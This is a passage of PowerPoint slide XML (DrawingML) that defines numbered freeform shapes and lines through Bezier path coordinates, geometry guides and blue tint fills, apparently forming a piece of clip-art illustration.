                      <a:pt x="168" y="67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6" name="Freeform 687"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="502" y="5374"/>
                <a:ext cx="503" cy="569"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 178 w 213"/>
                  <a:gd name="T1" fmla="*/ 214 h 241"/>
                  <a:gd name="T2" fmla="*/ 43 w 213"/>
                  <a:gd name="T3" fmla="*/ 169 h 241"/>
                  <a:gd name="T4" fmla="*/ 35 w 213"/>
                  <a:gd name="T5" fmla="*/ 27 h 241"/>
                  <a:gd name="T6" fmla="*/ 170 w 213"/>
                  <a:gd name="T7" fmla="*/ 72 h 241"/>
                  <a:gd name="T8" fmla="*/ 178 w 213"/>
                  <a:gd name="T9" fmla="*/ 214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3" h="241">
                    <a:moveTo>
                      <a:pt x="178" y="214"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="241"/>
                      <a:pt x="82" y="221"/>
                      <a:pt x="43" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="117"/>
                      <a:pt x="0" y="54"/>
                      <a:pt x="35" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="0"/>
                      <a:pt x="131" y="20"/>
                      <a:pt x="170" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="210" y="124"/>
                      <a:pt x="213" y="188"/>
                      <a:pt x="178" y="214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7" name="Freeform 688"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="602" y="5485"/>
                <a:ext cx="304" cy="347"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 129"/>
                  <a:gd name="T1" fmla="*/ 131 h 147"/>
                  <a:gd name="T2" fmla="*/ 26 w 129"/>
                  <a:gd name="T3" fmla="*/ 103 h 147"/>
                  <a:gd name="T4" fmla="*/ 21 w 129"/>
                  <a:gd name="T5" fmla="*/ 17 h 147"/>
                  <a:gd name="T6" fmla="*/ 103 w 129"/>
                  <a:gd name="T7" fmla="*/ 44 h 147"/>
                  <a:gd name="T8" fmla="*/ 108 w 129"/>
                  <a:gd name="T9" fmla="*/ 131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147">
                    <a:moveTo>
                      <a:pt x="108" y="131"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="147"/>
                      <a:pt x="50" y="135"/>
                      <a:pt x="26" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="72"/>
                      <a:pt x="0" y="33"/>
                      <a:pt x="21" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="0"/>
                      <a:pt x="79" y="13"/>
                      <a:pt x="103" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="76"/>
                      <a:pt x="129" y="114"/>
                      <a:pt x="108" y="13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8" name="Freeform 689"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1189" y="4859"/>
                <a:ext cx="498" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 211"/>
                  <a:gd name="T1" fmla="*/ 67 h 232"/>
                  <a:gd name="T2" fmla="*/ 46 w 211"/>
                  <a:gd name="T3" fmla="*/ 15 h 232"/>
                  <a:gd name="T4" fmla="*/ 46 w 211"/>
                  <a:gd name="T5" fmla="*/ 14 h 232"/>
                  <a:gd name="T6" fmla="*/ 12 w 211"/>
                  <a:gd name="T7" fmla="*/ 23 h 232"/>
                  <a:gd name="T8" fmla="*/ 19 w 211"/>
                  <a:gd name="T9" fmla="*/ 38 h 232"/>
                  <a:gd name="T10" fmla="*/ 41 w 211"/>
                  <a:gd name="T11" fmla="*/ 164 h 232"/>
                  <a:gd name="T12" fmla="*/ 100 w 211"/>
                  <a:gd name="T13" fmla="*/ 212 h 232"/>
                  <a:gd name="T14" fmla="*/ 109 w 211"/>
                  <a:gd name="T15" fmla="*/ 232 h 232"/>
                  <a:gd name="T16" fmla="*/ 154 w 211"/>
                  <a:gd name="T17" fmla="*/ 219 h 232"/>
                  <a:gd name="T18" fmla="*/ 154 w 211"/>
                  <a:gd name="T19" fmla="*/ 219 h 232"/>
                  <a:gd name="T20" fmla="*/ 176 w 211"/>
                  <a:gd name="T21" fmla="*/ 209 h 232"/>
                  <a:gd name="T22" fmla="*/ 168 w 211"/>
                  <a:gd name="T23" fmla="*/ 67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1" h="232">
                    <a:moveTo>
                      <a:pt x="168" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="21"/>
                      <a:pt x="82" y="0"/>
                      <a:pt x="46" y="15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0" y="70"/>
                      <a:pt x="8" y="121"/>
                      <a:pt x="41" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="186"/>
                      <a:pt x="78" y="203"/>
                      <a:pt x="100" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="232"/>
                      <a:pt x="109" y="232"/>
                      <a:pt x="109" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="219"/>
                      <a:pt x="154" y="219"/>
                      <a:pt x="154" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="219"/>
                      <a:pt x="154" y="219"/>
                      <a:pt x="154" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="218"/>
                      <a:pt x="169" y="214"/>
                      <a:pt x="176" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="183"/>
                      <a:pt x="207" y="119"/>
                      <a:pt x="168" y="67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9" name="Freeform 690"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1298" y="4875"/>
                <a:ext cx="503" cy="570"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 177 w 213"/>
                  <a:gd name="T1" fmla="*/ 214 h 241"/>
                  <a:gd name="T2" fmla="*/ 42 w 213"/>
                  <a:gd name="T3" fmla="*/ 169 h 241"/>
                  <a:gd name="T4" fmla="*/ 35 w 213"/>
                  <a:gd name="T5" fmla="*/ 27 h 241"/>
                  <a:gd name="T6" fmla="*/ 170 w 213"/>
                  <a:gd name="T7" fmla="*/ 72 h 241"/>
                  <a:gd name="T8" fmla="*/ 177 w 213"/>
                  <a:gd name="T9" fmla="*/ 214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3" h="241">
                    <a:moveTo>
                      <a:pt x="177" y="214"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="241"/>
                      <a:pt x="82" y="221"/>
                      <a:pt x="42" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="117"/>
                      <a:pt x="0" y="53"/>
                      <a:pt x="35" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="0"/>
                      <a:pt x="131" y="20"/>
                      <a:pt x="170" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="124"/>
                      <a:pt x="213" y="187"/>
                      <a:pt x="177" y="214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0" name="Freeform 691"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1201" y="4987"/>
                <a:ext cx="307" cy="347"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 130"/>
                  <a:gd name="T1" fmla="*/ 130 h 147"/>
                  <a:gd name="T2" fmla="*/ 26 w 130"/>
                  <a:gd name="T3" fmla="*/ 103 h 147"/>
                  <a:gd name="T4" fmla="*/ 22 w 130"/>
                  <a:gd name="T5" fmla="*/ 16 h 147"/>
                  <a:gd name="T6" fmla="*/ 104 w 130"/>
                  <a:gd name="T7" fmla="*/ 44 h 147"/>
                  <a:gd name="T8" fmla="*/ 108 w 130"/>
                  <a:gd name="T9" fmla="*/ 13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147">
                    <a:moveTo>
                      <a:pt x="108" y="130"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="147"/>
                      <a:pt x="50" y="134"/>
                      <a:pt x="26" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="71"/>
                      <a:pt x="0" y="33"/>
                      <a:pt x="22" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="0"/>
                      <a:pt x="80" y="12"/>
                      <a:pt x="104" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="75"/>
                      <a:pt x="130" y="114"/>
                      <a:pt x="108" y="13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1" name="Freeform 692"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1496" y="3465"/>
                <a:ext cx="2740" cy="2393"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1144 w 1160"/>
                  <a:gd name="T1" fmla="*/ 727 h 1013"/>
                  <a:gd name="T2" fmla="*/ 1054 w 1160"/>
                  <a:gd name="T3" fmla="*/ 679 h 1013"/>
                  <a:gd name="T4" fmla="*/ 954 w 1160"/>
                  <a:gd name="T5" fmla="*/ 346 h 1013"/>
                  <a:gd name="T6" fmla="*/ 876 w 1160"/>
                  <a:gd name="T7" fmla="*/ 233 h 1013"/>
                  <a:gd name="T8" fmla="*/ 0 w 1160"/>
                  <a:gd name="T9" fmla="*/ 0 h 1013"/>
                  <a:gd name="T10" fmla="*/ 0 w 1160"/>
                  <a:gd name="T11" fmla="*/ 713 h 1013"/>
                  <a:gd name="T12" fmla="*/ 99 w 1160"/>
                  <a:gd name="T13" fmla="*/ 739 h 1013"/>
                  <a:gd name="T14" fmla="*/ 110 w 1160"/>
                  <a:gd name="T15" fmla="*/ 613 h 1013"/>
                  <a:gd name="T16" fmla="*/ 261 w 1160"/>
                  <a:gd name="T17" fmla="*/ 663 h 1013"/>
                  <a:gd name="T18" fmla="*/ 292 w 1160"/>
                  <a:gd name="T19" fmla="*/ 791 h 1013"/>
                  <a:gd name="T20" fmla="*/ 858 w 1160"/>
                  <a:gd name="T21" fmla="*/ 943 h 1013"/>
                  <a:gd name="T22" fmla="*/ 873 w 1160"/>
                  <a:gd name="T23" fmla="*/ 824 h 1013"/>
                  <a:gd name="T24" fmla="*/ 1024 w 1160"/>
                  <a:gd name="T25" fmla="*/ 874 h 1013"/>
                  <a:gd name="T26" fmla="*/ 1056 w 1160"/>
                  <a:gd name="T27" fmla="*/ 996 h 1013"/>
                  <a:gd name="T28" fmla="*/ 1089 w 1160"/>
                  <a:gd name="T29" fmla="*/ 1005 h 1013"/>
                  <a:gd name="T30" fmla="*/ 1144 w 1160"/>
                  <a:gd name="T31" fmla="*/ 1013 h 1013"/>
                  <a:gd name="T32" fmla="*/ 1144 w 1160"/>
                  <a:gd name="T33" fmla="*/ 727 h 10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60" h="1013">
                    <a:moveTo>
                      <a:pt x="1144" y="727"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1127" y="704"/>
                      <a:pt x="1054" y="679"/>
                      <a:pt x="1054" y="679"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="954" y="346"/>
                      <a:pt x="954" y="346"/>
                      <a:pt x="954" y="346"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="954" y="346"/>
                      <a:pt x="934" y="250"/>
                      <a:pt x="876" y="23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713"/>
                      <a:pt x="0" y="713"/>
                      <a:pt x="0" y="713"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="739"/>
                      <a:pt x="99" y="739"/>
                      <a:pt x="99" y="739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="689"/>
                      <a:pt x="78" y="637"/>
                      <a:pt x="110" y="613"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="583"/>
                      <a:pt x="217" y="605"/>
                      <a:pt x="261" y="663"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294" y="706"/>
                      <a:pt x="304" y="756"/>
                      <a:pt x="292" y="791"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="858" y="943"/>
                      <a:pt x="858" y="943"/>
                      <a:pt x="858" y="943"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="837" y="895"/>
                      <a:pt x="842" y="847"/>
                      <a:pt x="873" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="794"/>
                      <a:pt x="980" y="816"/>
                      <a:pt x="1024" y="874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1054" y="915"/>
                      <a:pt x="1066" y="961"/>
                      <a:pt x="1056" y="996"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1089" y="1005"/>
                      <a:pt x="1089" y="1005"/>
                      <a:pt x="1089" y="1005"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1144" y="1013"/>
                      <a:pt x="1144" y="1013"/>
                      <a:pt x="1144" y="1013"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1144" y="1013"/>
                      <a:pt x="1160" y="750"/>
                      <a:pt x="1144" y="72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2" name="Freeform 693"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1496" y="3101"/>
                <a:ext cx="3413" cy="915"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 3413"/>
                  <a:gd name="T1" fmla="*/ 0 h 915"/>
                  <a:gd name="T2" fmla="*/ 0 w 3413"/>
                  <a:gd name="T3" fmla="*/ 364 h 915"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3413"/>
                  <a:gd name="T5" fmla="*/ 721 h 915"/>
                  <a:gd name="T6" fmla="*/ 1564 w 3413"/>
                  <a:gd name="T7" fmla="*/ 780 h 915"/>
                  <a:gd name="T8" fmla="*/ 2069 w 3413"/>
                  <a:gd name="T9" fmla="*/ 915 h 915"/>
                  <a:gd name="T10" fmla="*/ 3413 w 3413"/>
                  <a:gd name="T11" fmla="*/ 551 h 915"/>
                  <a:gd name="T12" fmla="*/ 1344 w 3413"/>
                  <a:gd name="T13" fmla="*/ 0 h 9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13" h="915">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="780"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2069" y="915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3413" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134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3" name="Freeform 694"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="573" y="3652"/>
                <a:ext cx="1767" cy="1417"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 747 w 748"/>
                  <a:gd name="T1" fmla="*/ 446 h 600"/>
                  <a:gd name="T2" fmla="*/ 647 w 748"/>
                  <a:gd name="T3" fmla="*/ 113 h 600"/>
                  <a:gd name="T4" fmla="*/ 569 w 748"/>
                  <a:gd name="T5" fmla="*/ 0 h 600"/>
                  <a:gd name="T6" fmla="*/ 0 w 748"/>
                  <a:gd name="T7" fmla="*/ 154 h 600"/>
                  <a:gd name="T8" fmla="*/ 78 w 748"/>
                  <a:gd name="T9" fmla="*/ 267 h 600"/>
                  <a:gd name="T10" fmla="*/ 178 w 748"/>
                  <a:gd name="T11" fmla="*/ 600 h 600"/>
                  <a:gd name="T12" fmla="*/ 748 w 748"/>
                  <a:gd name="T13" fmla="*/ 447 h 600"/>
                  <a:gd name="T14" fmla="*/ 747 w 748"/>
                  <a:gd name="T15" fmla="*/ 446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8" h="600">
                    <a:moveTo>
                      <a:pt x="747" y="446"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="647" y="113"/>
                      <a:pt x="647" y="113"/>
                      <a:pt x="647" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="647" y="113"/>
                      <a:pt x="626" y="18"/>
                      <a:pt x="569" y="0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58" y="171"/>
                      <a:pt x="78" y="267"/>
                      <a:pt x="78" y="267"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="600"/>
                      <a:pt x="178" y="600"/>
                      <a:pt x="178" y="600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="748" y="447"/>
                      <a:pt x="748" y="447"/>
                      <a:pt x="748" y="447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="447"/>
                      <a:pt x="747" y="446"/>
                      <a:pt x="747" y="44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4" name="Line 695"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="-1227" y="3392"/>
                <a:ext cx="2067" cy="55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5" name="Line 696"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="-960" y="3321"/>
                <a:ext cx="2067" cy="5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6" name="Line 697"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="-693" y="3248"/>
                <a:ext cx="2067" cy="5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7" name="Line 698"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="-426" y="3177"/>
                <a:ext cx="2067" cy="5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8" name="Freeform 699"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1399" y="3708"/>
                <a:ext cx="1443" cy="1106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1443"/>
                  <a:gd name="T1" fmla="*/ 0 h 1106"/>
                  <a:gd name="T2" fmla="*/ 0 w 1443"/>
                  <a:gd name="T3" fmla="*/ 721 h 1106"/>
                  <a:gd name="T4" fmla="*/ 1443 w 1443"/>
                  <a:gd name="T5" fmla="*/ 1106 h 1106"/>
                  <a:gd name="T6" fmla="*/ 1443 w 1443"/>
                  <a:gd name="T7" fmla="*/ 385 h 1106"/>
                  <a:gd name="T8" fmla="*/ 0 w 1443"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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43" h="1106">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="1106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="3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9" name="Freeform 700"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="141" y="4119"/>
                <a:ext cx="581" cy="1534"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 581 w 581"/>
                  <a:gd name="T1" fmla="*/ 154 h 1534"/>
                  <a:gd name="T2" fmla="*/ 0 w 581"/>
                  <a:gd name="T3" fmla="*/ 0 h 1534"/>
                  <a:gd name="T4" fmla="*/ 0 w 581"/>
                  <a:gd name="T5" fmla="*/ 1470 h 1534"/>
                  <a:gd name="T6" fmla="*/ 236 w 581"/>
                  <a:gd name="T7" fmla="*/ 1534 h 1534"/>
                  <a:gd name="T8" fmla="*/ 572 w 581"/>
                  <a:gd name="T9" fmla="*/ 1035 h 1534"/>
                  <a:gd name="T10" fmla="*/ 581 w 581"/>
                  <a:gd name="T11" fmla="*/ 154 h 1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1" h="1534">
                    <a:moveTo>
                      <a:pt x="581" y="154"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="1534"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="1035"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="15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0" name="Freeform 701"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="753" y="4370"/>
                <a:ext cx="210" cy="692"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 210 w 210"/>
                  <a:gd name="T1" fmla="*/ 692 h 692"/>
                  <a:gd name="T2" fmla="*/ 0 w 210"/>
                  <a:gd name="T3" fmla="*/ 635 h 692"/>
                  <a:gd name="T4" fmla="*/ 4 w 210"/>
                  <a:gd name="T5" fmla="*/ 0 h 692"/>
                  <a:gd name="T6" fmla="*/ 210 w 210"/>
                  <a:gd name="T7" fmla="*/ 692 h 6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0" h="692">
                    <a:moveTo>
                      <a:pt x="210" y="692"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="69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3399FF">
                      <a:gamma/>
                      <a:tint val="28235"/>
                      <a:invGamma/>
                    </a:srgbClr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1" name="Freeform 702"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="231" y="4238"/>
                <a:ext cx="451" cy="749"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 451"/>
                  <a:gd name="T1" fmla="*/ 0 h 749"/>
                  <a:gd name="T2" fmla="*/ 0 w 451"/>
                  <a:gd name="T3" fmla="*/ 626 h 749"/>
                  <a:gd name="T4" fmla="*/ 451 w 451"/>
                  <a:gd name="T5" fmla="*/ 749 h 749"/>
                  <a:gd name="T6" fmla="*/ 451 w 451"/>
                  <a:gd name="T7" fmla="*/ 120 h 749"/>
                  <a:gd name="T8" fmla="*/ 0 w 451"/>
                  <a:gd name="T9" fmla="*/ 0 h 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1" h="749">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="12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3399FF">
                      <a:gamma/>
                      <a:tint val="28235"/>
                      <a:invGamma/>
                    </a:srgbClr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2" name="Freeform 703"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="781" y="3930"/>
                <a:ext cx="1533" cy="1134"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 234 w 1533"/>
                  <a:gd name="T1" fmla="*/ 1134 h 1134"/>
                  <a:gd name="T2" fmla="*/ 0 w 1533"/>
                  <a:gd name="T3" fmla="*/ 348 h 1134"/>
                  <a:gd name="T4" fmla="*/ 1302 w 1533"/>
                  <a:gd name="T5" fmla="*/ 0 h 1134"/>
                  <a:gd name="T6" fmla="*/ 1533 w 1533"/>
                  <a:gd name="T7" fmla="*/ 785 h 1134"/>
                  <a:gd name="T8" fmla="*/ 234 w 1533"/>
                  <a:gd name="T9" fmla="*/ 1134 h 1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33" h="1134">
                    <a:moveTo>
                      <a:pt x="234" y="1134"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1302" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1533" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="113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3399FF">
                      <a:gamma/>
                      <a:tint val="28235"/>
                      <a:invGamma/>
                    </a:srgbClr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3" name="Freeform 704"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="994" y="4708"/>
                <a:ext cx="1594" cy="1150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 659 w 675"/>
                  <a:gd name="T1" fmla="*/ 47 h 487"/>
                  <a:gd name="T2" fmla="*/ 570 w 675"/>
                  <a:gd name="T3" fmla="*/ 0 h 487"/>
                  <a:gd name="T4" fmla="*/ 0 w 675"/>
                  <a:gd name="T5" fmla="*/ 153 h 487"/>
                  <a:gd name="T6" fmla="*/ 63 w 675"/>
                  <a:gd name="T7" fmla="*/ 180 h 487"/>
                  <a:gd name="T8" fmla="*/ 90 w 675"/>
                  <a:gd name="T9" fmla="*/ 201 h 487"/>
                  <a:gd name="T10" fmla="*/ 90 w 675"/>
                  <a:gd name="T11" fmla="*/ 487 h 487"/>
                  <a:gd name="T12" fmla="*/ 659 w 675"/>
                  <a:gd name="T13" fmla="*/ 337 h 487"/>
                  <a:gd name="T14" fmla="*/ 659 w 675"/>
                  <a:gd name="T15" fmla="*/ 47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75" h="487">
                    <a:moveTo>
                      <a:pt x="659" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="644" y="26"/>
                      <a:pt x="581" y="4"/>
                      <a:pt x="570" y="0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35" y="165"/>
                      <a:pt x="63" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="187"/>
                      <a:pt x="85" y="194"/>
                      <a:pt x="90" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="224"/>
                      <a:pt x="90" y="487"/>
                      <a:pt x="90" y="487"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="337"/>
                      <a:pt x="659" y="337"/>
                      <a:pt x="659" y="337"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="337"/>
                      <a:pt x="675" y="71"/>
                      <a:pt x="659" y="4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4" name="Freeform 705"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1289" y="5204"/>
                <a:ext cx="168" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 168"/>
                  <a:gd name="T1" fmla="*/ 220 h 220"/>
                  <a:gd name="T2" fmla="*/ 0 w 168"/>
                  <a:gd name="T3" fmla="*/ 45 h 220"/>
                  <a:gd name="T4" fmla="*/ 168 w 168"/>
                  <a:gd name="T5" fmla="*/ 0 h 220"/>
                  <a:gd name="T6" fmla="*/ 168 w 168"/>
                  <a:gd name="T7" fmla="*/ 175 h 220"/>
                  <a:gd name="T8" fmla="*/ 0 w 168"/>
                  <a:gd name="T9" fmla="*/ 22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8" h="220">
                    <a:moveTo>
                      <a:pt x="0" y="220"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
